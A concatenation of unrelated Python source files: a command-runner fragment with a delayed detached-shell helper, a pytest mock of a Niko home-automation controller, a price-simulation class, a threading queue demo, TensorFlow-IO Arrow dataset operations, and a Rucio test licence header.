        # valid_exit_codes (no else after the debug branch) — confirm intent
        if exit_code in valid_exit_codes if valid_exit_codes is not None else [0]:
            logger.debug(
                'Command "{}" returned with exit code "{}". Command output was:'.format(
                    command, exit_code
                )
            )
        logger.error(
            'Command "{}" failed with exit code "{}". Command output was:'.format(
                command, exc.returncode
            )
        )
        logger.error(output)
    except FileNotFoundError as exc:
        logger.error('Command "{}" failed, file not found: {}'.format(command, exc))
        exit_code, output = -253, exc.__str__()
    # On python 2.7, OSError is also raised when file is not found (no FileNotFoundError)
    # pylint: disable=W0705 (duplicate-except)
    except (OSError, IOError) as exc:
        logger.error('Command "{}" failed because of OS: {}'.format(command, exc))
        exit_code, output = -253, exc.__str__()
    except TimeoutExpired as exc:
        message = 'Timeout {} seconds expired for command "{}" execution. Original output was: {}'.format(
            timeout, command, exc.output
        )
        logger.error(message)
        if stdout_to_file:
            _stdout.write(message.encode(encoding, errors=errors))
        exit_code, output = (
            -254,
            'Timeout of {} seconds expired for command "{}" execution. Original output was: {}'.format(
                timeout, command, exc.output
            ),
        )
    # We need to be able to catch a broad exception
    # pylint: disable=W0703
    except Exception as exc:
        logger.error(
            'Command "{}" failed for unknown reasons: {}'.format(command, exc),
            exc_info=True,
        )
        logger.debug("Error:", exc_info=True)
        exit_code, output = -255, exc.__str__()
    finally:
        # Always close the file handles we opened ourselves
        if stdout_to_file:
            _stdout.close()
        if stderr_to_file:
            _stderr.close()
    logger.debug(output)
    return exit_code, output
def deferred_command(command, defer_time=300):
    # type: (str, int) -> None
    """
    Launch a shell command detached from the parent process, delayed by
    roughly `defer_time` seconds.

    This is basically an ugly hack, but especially useful to launch an auto
    update/deletion of a running executable a given amount of seconds after
    it finished.
    """
    # ping is used as a poor man's sleep since it exists on virtually *any* system
    if os.name == "nt":
        timer_prefix = "ping 127.0.0.1 -n {} > NUL & ".format(defer_time)
    else:
        timer_prefix = "ping 127.0.0.1 -c {} > /dev/null && ".format(defer_time)
    # Single string command since shell=True; the spawned shell is fully
    # detached from our stdio so it survives our own exit
    subprocess.Popen(
        timer_prefix + command,
        shell=True,
        stdin=None,
        stdout=None,
        stderr=None,
        close_fds=True,
    )
|
__init__.py
|
"""Unit test package for niko_homekit."""
import pytest
import json
import threading
from socket import socket
from threading import Thread
from niko_homekit.niko import Niko
class MockNikoController(object):
    """Mocks a Niko Home Control controller

    Listens on an ephemeral 127.0.0.1 port, accepts a single connection in a
    background thread, records every received payload in `self.calls`, and
    answers a small subset of the controller's JSON protocol
    (listlocations / listactions / executeactions). Anything else is echoed
    back verbatim.
    """
    def __init__(self):
        super(MockNikoController, self).__init__()
        # Bind to port 0 so the OS picks a free port (see `port` property)
        self.sock = socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.sock.settimeout(1)
        self._stop = False
        self.calls = []  # raw decoded payloads received, in order
        self.connections = 0  # number of accepted connections
        pass
    @property
    def port(self):
        # Actual port chosen by the OS at bind time
        return self.sock.getsockname()[1]
    def _start(self):
        """Accept one connection and serve requests until shutdown."""
        try:
            conn, addr = self.sock.accept()
            with conn:
                self.connections += 1
                while not self._stop:
                    try:
                        data = conn.recv(1024).decode()
                        # NOTE(review): recorded before the empty-payload check,
                        # so a closing "" recv is also appended to calls
                        self.calls.append(data)
                        if not data:
                            break
                        print(data)
                        parsed = json.loads(data)
                        print(parsed)
                        if "cmd" in parsed:
                            result = {"cmd": parsed["cmd"]}
                            print(result)
                            if parsed["cmd"] == "listlocations":
                                result["data"] = [
                                    {"id": 1, "name": "location1"},
                                    {"id": 2, "name": "location2"},
                                ]
                                conn.sendall(json.dumps(result).encode() + b"\r\n")
                            elif parsed["cmd"] == "listactions":
                                result["data"] = [
                                    {
                                        "id": 1,
                                        "name": "Action 1",
                                        "value1": 0,
                                        "type": 1,
                                    },
                                    {
                                        "id": 2,
                                        "name": "Action 2",
                                        "value1": 0,
                                        "type": 1,
                                    },
                                ]
                                conn.sendall(json.dumps(result).encode() + b"\r\n")
                            elif parsed["cmd"] == "executeactions":
                                result["data"] = {"error": 0}
                                conn.sendall(json.dumps(result).encode() + b"\r\n")
                        else:
                            # Valid JSON without a "cmd" key: echo it back
                            conn.sendall(data.encode() + b"\r\n")
                    except ConnectionResetError:
                        break
                    except json.JSONDecodeError:
                        # Non-JSON payloads are echoed back as-is
                        if data:
                            conn.sendall(data.encode() + b"\r\n")
                        pass
        except ConnectionAbortedError as e:
            print("Closing conn")
            # Expected during shutdown(); re-raise only if not shutting down
            if not self._stop:
                raise (e)
        return
    def start(self):
        """Start serving in a daemon thread (returns immediately)."""
        self.thread = Thread(target=self._start, daemon=True)
        return self.thread.start()
    def shutdown(self):
        """Stop the serve loop, close the socket and join the thread."""
        print("Shutting down MockNikoController")
        self._stop = True
        self.sock.close()
        self.thread.join(2)
        print("Stopped MockNikoController")
        return
@pytest.fixture
def controller():
    """Pytest fixture: a running MockNikoController, shut down after the test."""
    _controller = MockNikoController()
    _controller.start()
    yield _controller
    _controller.shutdown()
@pytest.fixture
async def niko(controller):
    """Pytest fixture: a Niko client connected to the mock controller."""
    niko = Niko("127.0.0.1", controller.port)
    await niko.connect()
    yield niko
    await niko.close()
|
exchange.py
|
# DEPENDENCIES
import time
import os
import threading
import numpy as np
# CUSTOM MODULES
import support
from globals import config_dict
class Exchange(object):
    """
    The Exchange class keeps track of the prices

    Prices follow a multivariate Gaussian random walk that is advanced by a
    daemon thread started from __init__ (see update_prices_thread).
    """
    def __init__(self):
        # Initial prices come from the global configuration
        self.price_vector:np.ndarray = np.array([config_dict['Exchange']['price_1'], config_dict['Exchange']['price_2'], config_dict['Exchange']['price_3']])
        self.price_history:np.ndarray = np.tile(self.price_vector, reps=(config_dict['Exchange']['price_history_length'],1)) # price history matrix with prices being column vectors (each row is a timestep)
        self.covariance_matrix:np.ndarray = self.generate_covariance_matrix()
        self.rates = self.quick_rates()
        self.update_prices()
    def current_prices(self) -> tuple:
        """
        Return the current prices as a tuple of floats
        """
        return self.price_vector[0], self.price_vector[1], self.price_vector[2]
    def generate_covariance_matrix(self) -> np.ndarray:
        """
        Generate a small random sample of 3 variables, calculate the covariance matrix, return it.
        """
        n_vars = self.price_vector.shape[0]
        samples = np.random.uniform(low=0, high=config_dict['Exchange']['max_variance_factor'], size=(n_vars,10))
        return np.cov(samples, bias=True)
    def update_prices(self) -> None:
        """
        Start the daemon thread that constantly updates the asset prices.
        """
        threading.Thread(target=self.update_prices_thread, args=[], daemon=True).start()
    def update_prices_thread(self) -> None:
        """
        A loop that constantly updates the prices.
        Draw multivariate normal errors, add them to the prices
        to create a random walk process.
        """
        while True:
            print('prices: ', self.price_vector)
            time.sleep(config_dict['Exchange']['update_delay']) # delay between each price update
            eps = np.random.multivariate_normal(np.zeros(3), self.covariance_matrix, size=1, check_valid='warn', tol=1e-8) # draw increment
            self.price_vector = np.abs(np.add(self.price_vector, eps, casting='unsafe'))[0] # update prices; abs() keeps them non-negative
            self.price_history = np.concatenate((self.price_history[1:,:], np.reshape(self.price_vector, newshape=(-1,3))), axis=0) # (t x k) array, with t included timesteps and k prices
            self.rates = self.quick_rates() # calculate currency/currency_1 rates
    def get_price_history(self):
        """
        Converts price history array to a list of price lists - [[p11, p12, ...], [p21, ...], ...]
        List i in the returned list is the price history list of price i.
        """
        # BUG FIX: previously read self.exchange.price_history, but Exchange
        # has no `exchange` attribute, so this always raised AttributeError.
        return [list(self.price_history[:,i]) for i in range(self.price_history.shape[1])]
    def quick_rates(self):
        """
        Return a list of rates - each price divided by the first one.
        """
        return [p/self.price_vector[0] for p in self.price_vector]
    def get_rate(self, c1:int, c2:int):
        """
        Get rate of two currencies, c1/c2, so the rate is in label_2/label_1.
        :param c1: Numerator of the exchange rate.
        :type c1: int
        :param c2: Denominator of the exchange rate.
        :type c2: int
        :return: The rate c1/c2 where c1 and c2 are prices
        :rtype: float
        """
        return self.price_vector[c1]/self.price_vector[c2]
|
8_queued_no_waits.py
|
import time
import random
import queue
from threading import Thread # still needed for daemon threads
from concurrent.futures import ThreadPoolExecutor
# Shared state: `counter` is only ever mutated by the single
# increment_manager thread, so updates are serialized through counter_queue.
counter = 0
job_queue = queue.Queue()  # print jobs consumed by printer_manager
counter_queue = queue.Queue()  # pending increments consumed by increment_manager
def increment_manager():
    """Single consumer thread that applies queued increments to the counter."""
    global counter
    while True:
        increment = counter_queue.get()  # blocks until an increment is available
        old_counter = counter
        counter = old_counter + increment
        job_queue.put((f'New counter value {counter}', '------------'))
        counter_queue.task_done()  # mark this increment as processed (for join())
# printer_manager and increment_manager run continuously because of the `daemon` flag.
Thread(target=increment_manager, daemon=True).start()
def printer_manager():
    """Single consumer thread that prints each queued job's lines."""
    while True:
        for line in job_queue.get():
            print(line)
        job_queue.task_done()
# printer_manager and increment_manager run continuously because of the `daemon` flag.
Thread(target=printer_manager, daemon=True).start()
def increment_counter():
    """Producer: request a +1 increment of the shared counter."""
    counter_queue.put(1)
with ThreadPoolExecutor(max_workers=10) as pool:
    [pool.submit(increment_counter) for x in range(10)]
counter_queue.join()  # wait for counter_queue to be empty
job_queue.join()  # wait for job_queue to be empty
|
arrow_dataset_ops.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Arrow Dataset."""
from functools import partial
import io
from itertools import chain
import os
import socket
import threading
import tempfile
import tensorflow as tf
from tensorflow import dtypes
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import structure as structure_lib
from tensorflow_io.core.python.ops import core_ops
if hasattr(tf, "nest"):
from tensorflow import nest # pylint: disable=ungrouped-imports
else:
from tensorflow.python.data.util import nest # pylint: disable=ungrouped-imports
def arrow_to_tensor_type(pa_t):
    """Convert Arrow type to tuple of (Tensor dtype, shape dims).
    This function requires pyarrow to be installed.
    """
    import pyarrow as pa  # pylint: disable=import-outside-toplevel
    # Variable-length list types recurse into their value type and gain an
    # extra unknown dimension; nested lists are rejected.
    if pa.types.is_list(pa_t):
        if pa.types.is_list(pa_t.value_type):
            raise TypeError("Nested arrays are not currently supported: " + str(pa_t))
        tf_t, shape_dims = arrow_to_tensor_type(pa_t.value_type)
        shape_dims.append(None)  # pyarrow scalar arrays can be variable length
        return tf_t, shape_dims
    # Scalar Arrow types map 1:1 onto TensorFlow dtypes; probe each predicate.
    scalar_type_map = (
        (pa.types.is_boolean, dtypes.bool),
        (pa.types.is_int8, dtypes.int8),
        (pa.types.is_int16, dtypes.int16),
        (pa.types.is_int32, dtypes.int32),
        (pa.types.is_int64, dtypes.int64),
        (pa.types.is_uint8, dtypes.uint8),
        (pa.types.is_uint16, dtypes.uint16),
        (pa.types.is_uint32, dtypes.uint32),
        (pa.types.is_uint64, dtypes.uint64),
        (pa.types.is_float16, dtypes.float16),
        (pa.types.is_float32, dtypes.float32),
        (pa.types.is_float64, dtypes.float64),
    )
    for predicate, tf_t in scalar_type_map:
        if predicate(pa_t):
            return tf_t, []  # scalar: no shape dims
    raise TypeError("Unsupported type in conversion from Arrow: " + str(pa_t))
def arrow_schema_to_tensor_types(schema):
    """Convert an Arrow schema to tuple of (Tensor dtypes, TensorShapes).
    This function requires pyarrow to be installed.
    """
    # Transpose the per-field (dtype, dims) pairs into parallel tuples
    tensor_types, shape_dims = zip(
        *(arrow_to_tensor_type(field.type) for field in schema)
    )
    return tensor_types, tuple(tf.TensorShape(dims) for dims in shape_dims)
class ArrowBaseDataset(dataset_ops.DatasetV2):
    """Base class for Arrow Datasets to provide columns used in record batches
    and corresponding output tensor types, shapes and classes.
    """
    batch_modes_supported = ("keep_remainder", "drop_remainder", "auto")
    def __init__(
        self,
        make_variant_fn,
        columns,
        output_types,
        output_shapes=None,
        batch_size=None,
        batch_mode="keep_remainder",
    ):
        """Wrap a kernel-op factory into a tf.data dataset.

        Args:
          make_variant_fn: Callable building the dataset variant tensor; called
            with columns, batch_size, batch_mode and the flat structure kwargs.
          columns: Column indices to read from each record batch.
          output_types: Tensor dtypes of the output tensors.
          output_shapes: TensorShapes of the outputs, or None to leave unknown.
          batch_size: Optional batch size applied inside Arrow memory.
          batch_mode: One of batch_modes_supported.
        """
        self._columns = columns
        # Shapes default to fully-unknown when not provided
        self._structure = structure_lib.convert_legacy_structure(
            output_types,
            output_shapes
            or nest.map_structure(lambda _: tf.TensorShape(None), output_types),
            nest.map_structure(lambda _: tf.Tensor, output_types),
        )
        # batch_size/batch_mode are passed to the kernel as tensors
        self._batch_size = tf.convert_to_tensor(
            batch_size or 0, dtype=dtypes.int64, name="batch_size"
        )
        if batch_mode not in self.batch_modes_supported:
            raise ValueError(
                "Unsupported batch_mode: '{}', must be one of {}".format(
                    batch_mode, self.batch_modes_supported
                )
            )
        self._batch_mode = tf.convert_to_tensor(
            batch_mode, dtypes.string, name="batch_mode"
        )
        if batch_size is not None or batch_mode == "auto":
            # Batch dimension is only statically known with drop_remainder
            spec_batch_size = batch_size if batch_mode == "drop_remainder" else None
            # pylint: disable=protected-access
            self._structure = nest.map_structure(
                lambda component_spec: component_spec._batch(spec_batch_size),
                self._structure,
            )
        variant_tensor = make_variant_fn(
            columns=self._columns,
            batch_size=self._batch_size,
            batch_mode=self._batch_mode,
            **self._flat_structure
        )
        super().__init__(variant_tensor)
    def _inputs(self):
        # This dataset is a source: it has no upstream input datasets
        return []
    @property
    def element_spec(self):
        return self._structure
    @property
    def columns(self):
        # Column indices selected from the record batches
        return self._columns
    @property
    def batch_size(self):
        # int64 scalar tensor (0 means "no batching requested")
        return self._batch_size
    @property
    def batch_mode(self):
        # string scalar tensor, one of batch_modes_supported
        return self._batch_mode
class ArrowDataset(ArrowBaseDataset):
    """An Arrow Dataset from record batches in memory, or a Pandas DataFrame.
    """
    def __init__(
        self,
        serialized_batches,
        columns,
        output_types,
        output_shapes=None,
        batch_size=None,
        batch_mode="keep_remainder",
        arrow_buffer=None,
    ):
        """Create an ArrowDataset from a Tensor of serialized batches.
        This constructor requires pyarrow to be installed.
        Args:
          serialized_batches: A string Tensor as a serialized buffer containing
                              Arrow record batches in Arrow File format
          columns: A list of column indices to be used in the Dataset
          output_types: Tensor dtypes of the output tensors
          output_shapes: TensorShapes of the output tensors or None to
                         infer partial
          batch_size: Batch size of output tensors, setting a batch size here
                      will create batched Tensors from Arrow memory and can be more
                      efficient than using tf.data.Dataset.batch().
                      NOTE: batch_size does not need to be set if batch_mode='auto'
          batch_mode: Mode of batching, supported strings:
                      "keep_remainder" (default, keeps partial batch data),
                      "drop_remainder" (discard partial batch data),
                      "auto" (size to number of records in Arrow record batch)
          arrow_buffer: Optional Arrow Buffer containing Arrow record batches in
                        Arrow File format. This will share the Arrow buffer with
                        the C++ kernel by address for zero-copy. Only supported if
                        the kernel process is local, with TensorFlow in eager mode.
                        If this is used, set `serialized_batches` to `None`.
        """
        if serialized_batches is not None:
            make_variant_fn = partial(
                core_ops.io_arrow_serialized_dataset, serialized_batches
            )
        elif arrow_buffer is None:
            # BUG FIX: error message previously misspelled "serialzied_batches"
            raise ValueError("Must set either serialized_batches or arrow_buffer")
        elif not tf.executing_eagerly():
            raise ValueError(
                "Using arrow_buffer for zero-copy only supported in "
                "TensorFlow Eager mode."
            )
        else:
            # Zero-copy: hand the kernel the raw buffer address and size
            address_int = arrow_buffer.address
            buffer_address = tf.convert_to_tensor(
                address_int, dtype=dtypes.uint64, name="buffer_address"
            )
            buffer_size = tf.convert_to_tensor(
                arrow_buffer.size, dtype=dtypes.int64, name="buffer_size"
            )
            make_variant_fn = partial(
                core_ops.io_arrow_zero_copy_dataset, buffer_address, buffer_size
            )
            # Keep a reference to the arrow buffers used so the shared memory
            # outlives this dataset (only needed on the zero-copy path)
            self._arrow_buffer_refs = [arrow_buffer]
        super().__init__(
            make_variant_fn,
            columns,
            output_types,
            output_shapes,
            batch_size,
            batch_mode,
        )
    @classmethod
    def from_record_batches(
        cls,
        record_batches,
        output_types,
        output_shapes=None,
        columns=None,
        batch_size=None,
        batch_mode="keep_remainder",
    ):
        """Create an ArrowDataset directly from Arrow record batches.
        This constructor requires pyarrow to be installed.
        Args:
          record_batches: An Arrow record batch or sequence of record batches
          output_types: Tensor dtypes of the output tensors
          output_shapes: TensorShapes of the output tensors or None to
                         infer partial
          batch_size: Batch size of output tensors, setting a batch size here
                      will create batched tensors from Arrow memory and can be more
                      efficient than using tf.data.Dataset.batch().
                      NOTE: batch_size does not need to be set if batch_mode='auto'
          batch_mode: Mode of batching, supported strings:
                      "keep_remainder" (default, keeps partial batch data),
                      "drop_remainder" (discard partial batch data),
                      "auto" (size to number of records in Arrow record batch)
          columns: A list of column indices to be used in the Dataset
        """
        import pyarrow as pa  # pylint: disable=import-outside-toplevel
        if isinstance(record_batches, pa.RecordBatch):
            record_batches = [record_batches]
        assert record_batches
        if columns is None:
            columns = tuple(range(record_batches[0].num_columns))
        if tf.executing_eagerly():
            # Eager mode: serialize into an Arrow buffer for zero-copy sharing
            sink = pa.BufferOutputStream()
            writer = pa.RecordBatchFileWriter(sink, record_batches[0].schema)
            for batch in record_batches:
                writer.write_batch(batch)
            writer.close()
            serialized_batches = None
            arrow_buffer = sink.getvalue()
        else:
            # Graph mode: serialize into a string tensor instead
            buf = io.BytesIO()
            writer = pa.RecordBatchFileWriter(buf, record_batches[0].schema)
            for batch in record_batches:
                writer.write_batch(batch)
            writer.close()
            serialized_batches = tf.convert_to_tensor(
                buf.getvalue(), dtype=dtypes.string, name="serialized_batches"
            )
            arrow_buffer = None
        return cls(
            serialized_batches,
            columns,
            output_types,
            output_shapes,
            batch_size=batch_size,
            batch_mode=batch_mode,
            arrow_buffer=arrow_buffer,
        )
    @classmethod
    def from_pandas(
        cls,
        df,
        columns=None,
        preserve_index=True,
        batch_size=None,
        batch_mode="keep_remainder",
    ):
        """Create an ArrowDataset from a given Pandas DataFrame. Output types
        and shapes are inferred from the Arrow schema after DataFrame conversion.
        If preserve_index is True, the DataFrame index will be the last column.
        This method requires pyarrow to be installed.
        Args:
          df: a Pandas DataFrame
          columns: Optional column indices to use, if None all are used
          preserve_index: Flag to include the DataFrame index as the last column
          batch_size: Batch size of output tensors, setting a batch size here
                      will create batched tensors from Arrow memory and can be more
                      efficient than using tf.data.Dataset.batch().
                      NOTE: batch_size does not need to be set if batch_mode='auto'
          batch_mode: Mode of batching, supported strings:
                      "keep_remainder" (default, keeps partial batch data),
                      "drop_remainder" (discard partial batch data),
                      "auto" (size to number of records in Arrow record batch)
        """
        import pyarrow as pa  # pylint: disable=import-outside-toplevel
        if columns is not None:
            df = df.iloc[:, list(columns)]
        batch = pa.RecordBatch.from_pandas(df, preserve_index=preserve_index)
        columns = tuple(range(batch.num_columns))
        output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
        return cls.from_record_batches(
            batch,
            output_types,
            output_shapes,
            columns=columns,
            batch_size=batch_size,
            batch_mode=batch_mode,
        )
class ArrowFeatherDataset(ArrowBaseDataset):
    """An Arrow Dataset that reads record batches from Arrow Feather files.

    Feather is a light-weight columnar format well suited to round-tripping
    Pandas DataFrames; pyarrow can read and write it, see
    https://arrow.apache.org/docs/python/ipc.html#feather-format
    """

    def __init__(
        self,
        filenames,
        columns,
        output_types,
        output_shapes=None,
        batch_size=None,
        batch_mode="keep_remainder",
    ):
        """Create the dataset from one or more Feather file names.

        Args:
            filenames: A `tf.string` tensor, Python list or scalar containing
                files in Arrow Feather format
            columns: column indices to expose in the Dataset
            output_types: tensor dtypes of the output tensors
            output_shapes: TensorShapes of the outputs, or None to infer
                partial shapes
            batch_size: batch size of output tensors; batching straight from
                Arrow memory can be more efficient than
                tf.data.Dataset.batch(). Unneeded when batch_mode='auto'.
            batch_mode: "keep_remainder" (default, keeps partial batch data),
                "drop_remainder" (discards partial batch data), or "auto"
                (batch sized to each Arrow record batch)
        """
        filename_tensor = tf.convert_to_tensor(
            filenames, dtype=dtypes.string, name="filenames"
        )
        super().__init__(
            partial(core_ops.io_arrow_feather_dataset, filename_tensor),
            columns,
            output_types,
            output_shapes,
            batch_size,
            batch_mode,
        )

    @classmethod
    def from_schema(
        cls,
        filenames,
        schema,
        columns=None,
        batch_size=None,
        batch_mode="keep_remainder",
    ):
        """Create the dataset, inferring types and shapes from an Arrow schema.

        Requires pyarrow to be installed.

        Args:
            filenames: A `tf.string` tensor, Python list or scalar containing
                files in Arrow Feather format
            schema: Arrow schema describing the record batch data
            columns: column indices to select from the schema, None for all
            batch_size: batch size of output tensors (see __init__);
                unneeded when batch_mode='auto'
            batch_mode: "keep_remainder" (default), "drop_remainder" or
                "auto" (see __init__)
        """
        if columns is None:
            columns = [index for index in range(len(schema))]
        output_types, output_shapes = arrow_schema_to_tensor_types(schema)
        return cls(
            filenames, columns, output_types, output_shapes, batch_size, batch_mode
        )
class ArrowStreamDataset(ArrowBaseDataset):
    """An Arrow Dataset for reading record batches from an input stream.
    Currently supported input streams are a socket client or stdin.
    """

    def __init__(
        self,
        endpoints,
        columns,
        output_types,
        output_shapes=None,
        batch_size=None,
        batch_mode="keep_remainder",
    ):
        """Create an ArrowDataset from an input stream.
        Args:
            endpoints: A `tf.string` tensor, Python list or scalar string defining the
                input stream.
                `endpoints` supports the following formats:
                - "host:port": IPv4 address (default)
                - "tcp://<host:port>": IPv4 address,
                - "unix://<path>": local path as unix socket address,
                - "fd://<number>": STDIN or file descriptor number. For
                    STDIN, use "fd://0" or "fd://-".
            columns: A list of column indices to be used in the Dataset
            output_types: Tensor dtypes of the output tensors
            output_shapes: TensorShapes of the output tensors or None to
                infer partial
            batch_size: Batch size of output tensors, setting a batch size here
                will create batched tensors from Arrow memory and can be more
                efficient than using tf.data.Dataset.batch().
                NOTE: batch_size does not need to be set if batch_mode='auto'
            batch_mode: Mode of batching, supported strings:
                "keep_remainder" (default, keeps partial batch data),
                "drop_remainder" (discard partial batch data),
                "auto" (size to number of records in Arrow record batch)
        """
        endpoints = tf.convert_to_tensor(
            endpoints, dtype=dtypes.string, name="endpoints"
        )
        # The kernel op resolves and connects to the endpoint(s) lazily.
        super().__init__(
            partial(core_ops.io_arrow_stream_dataset, endpoints),
            columns,
            output_types,
            output_shapes,
            batch_size,
            batch_mode,
        )

    @classmethod
    def from_schema(
        cls,
        endpoints,
        schema,
        columns=None,
        batch_size=None,
        batch_mode="keep_remainder",
    ):
        """Create an Arrow Dataset from an input stream, inferring output types
        and shapes from the given Arrow schema.
        This method requires pyarrow to be installed.
        Args:
            endpoints: A `tf.string` tensor, Python list or scalar string defining the
                input stream.
                `endpoints` supports the following formats:
                - "host:port": IPv4 address (default)
                - "tcp://<host:port>": IPv4 address,
                - "unix://<path>": local path as unix socket address,
                - "fd://<number>": STDIN or file descriptor number. For
                    STDIN, use "fd://0" or "fd://-".
            schema: Arrow schema defining the record batch data in the stream
            columns: A list of column indicies to use from the schema, None for all
            batch_size: Batch size of output tensors, setting a batch size here
                will create batched tensors from Arrow memory and can be more
                efficient than using tf.data.Dataset.batch().
                NOTE: batch_size does not need to be set if batch_mode='auto'
            batch_mode: Mode of batching, supported strings:
                "keep_remainder" (default, keeps partial batch data),
                "drop_remainder" (discard partial batch data),
                "auto" (size to number of records in Arrow record batch)
        """
        if columns is None:
            columns = list(range(len(schema)))
        output_types, output_shapes = arrow_schema_to_tensor_types(schema)
        return cls(
            endpoints, columns, output_types, output_shapes, batch_size, batch_mode
        )

    @classmethod
    def from_record_batches(
        cls,
        record_batch_iter,
        output_types,
        output_shapes=None,
        columns=None,
        batch_size=None,
        batch_mode="keep_remainder",
        record_batch_iter_factory=None,
    ):
        """Create an ArrowStreamDataset by serving a sequence of Arrow record
        batches in a background thread.
        This constructor requires pyarrow to be installed.
        Args:
            record_batch_iter: A sequence or iterator of Arrow record batches
            output_types: Tensor dtypes of the output tensors
            output_shapes: TensorShapes of the output tensors or None to
                infer partial
            columns: Optional list of column indices to be used, if None all are used
            batch_size: Batch size of output tensors, setting a batch size here
                will create batched tensors from Arrow memory and can be more
                efficient than using tf.data.Dataset.batch().
                NOTE: batch_size does not need to be set if batch_mode='auto'
            batch_mode: Mode of batching, supported strings:
                "keep_remainder" (default, keeps partial batch data),
                "drop_remainder" (discard partial batch data),
                "auto" (size to number of records in Arrow record batch)
            record_batch_iter_factory: Optional factory to create additional record
                batch iterators for multiple iterations.
        """
        import pyarrow as pa  # pylint: disable=import-outside-toplevel

        # Create a UDS server by default if not Windows
        if os.name != "nt":
            sock_path = os.path.join(tempfile.gettempdir(), "arrow_io_stream.sock")
            endpoint = "unix://{}".format(sock_path)
            # Remove a stale socket file from a previous run; only re-raise
            # if the path exists but could not be unlinked.
            try:
                os.unlink(sock_path)
            except OSError:
                if os.path.exists(sock_path):
                    raise
            sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            sock.bind(sock_path)
        # Create a TCP server
        else:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Port 0 lets the OS pick a free port; read it back for the endpoint.
            sock.bind(("127.0.0.1", 0))
            host_addr, port = sock.getsockname()
            endpoint = "{}:{}".format(host_addr, port)
        sock.listen(1)

        def run_server():
            """serve record batches"""
            curr_iter = record_batch_iter
            # Accept one client at a time and stream all batches to it.
            while True:
                conn, _ = sock.accept()
                outfile = conn.makefile(mode="wb")
                writer = None
                try:
                    for batch in curr_iter:
                        # The stream writer is created lazily so the schema can
                        # be taken from the first batch served.
                        if writer is None:
                            writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
                        writer.write_batch(batch)
                    # Refresh the iterator so a re-iterated Dataset gets data again.
                    if record_batch_iter_factory is not None:
                        curr_iter = record_batch_iter_factory()
                finally:
                    if writer is not None:
                        writer.close()
                    outfile.close()
                    conn.close()
            # NOTE(review): unreachable — the `while True` loop above never
            # exits; the listening socket is only reclaimed at process exit.
            sock.close()

        # Run the server in a thread
        server = threading.Thread(target=run_server)
        server.daemon = True
        server.start()

        if columns is None:
            columns = list(range(len(output_types)))

        return cls(
            endpoint, columns, output_types, output_shapes, batch_size, batch_mode
        )

    @classmethod
    def from_pandas(
        cls, data_frames, columns=None, preserve_index=True, batch_size=None
    ):
        """Create an ArrowStreamDataset by serving a DataFrame, or batches of a
        DataFrame in a background thread.
        This constructor requires pandas and pyarrow to be installed.
        Args:
            data_frames: A Pandas DataFrame or sequence of DataFrames
            columns: Optional column indices to use, if None all are used
            preserve_index: Flag to include the DataFrame index as the last column
            batch_size: Batch size of output tensors, setting a batch size here
                will create batched tensors from Arrow memory and can be more
                efficient than using tf.data.Dataset.batch().
                NOTE: Currently, only 'keep_remainder' batch mode supported
        """
        import pandas as pd  # pylint: disable=import-outside-toplevel
        import pyarrow as pa  # pylint: disable=import-outside-toplevel

        if isinstance(data_frames, pd.DataFrame):
            data_frames = [data_frames]

        def gen_record_batches():
            """record batch generator"""
            for df in data_frames:
                if columns is not None:
                    df = df.iloc[:, list(columns)]
                # If batching, slice DataFrame and convert to record batches
                if batch_size is not None:
                    # Pandas will produce a partial batch if there is a remainder
                    for i in range(0, len(df), batch_size):
                        df_slice = df[i : i + batch_size]
                        batch = pa.RecordBatch.from_pandas(
                            df_slice, preserve_index=preserve_index
                        )
                        yield batch
                # Not batching, convert entire DataFrame to one record batch
                else:
                    batch = pa.RecordBatch.from_pandas(
                        df, preserve_index=preserve_index
                    )
                    yield batch

        # Get first batch to convert schema to output types and shapes
        record_batch_iter = gen_record_batches()
        batch = next(record_batch_iter)
        output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)

        # Re-chain the consumed first batch so the server streams it too.
        return cls.from_record_batches(
            chain([batch], record_batch_iter),
            output_types,
            output_shapes,
            batch_size=batch_size,
            batch_mode="keep_remainder",
            record_batch_iter_factory=gen_record_batches,
        )
def list_feather_columns(filename, **kwargs):
    """Return a dict mapping column name -> tf.TensorSpec for a feather file.

    Only works in eager mode: the column metadata tensors returned by the
    kernel op are read back immediately via `.numpy()`.
    """
    if not tf.executing_eagerly():
        raise NotImplementedError("list_feather_columns only support eager mode")
    memory = kwargs.get("memory", "")
    columns, dtypes_, shapes = core_ops.io_list_feather_columns(filename, memory=memory)
    specs = {}
    for column, dtype, shape in zip(
        tf.unstack(columns), tf.unstack(dtypes_), tf.unstack(shapes)
    ):
        name = column.numpy().decode()
        specs[name] = tf.TensorSpec(shape.numpy(), dtype.numpy().decode(), name)
    return specs
|
test_clients.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2017
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2019
# - Angelos Molfetas <Angelos.Molfetas@cern.ch>, 2012
# - Martin Barisits <martin.barisits@cern.ch>, 2014
# - Cedric Serfon <cedric.serfon@cern.ch>, 2017
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2018
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
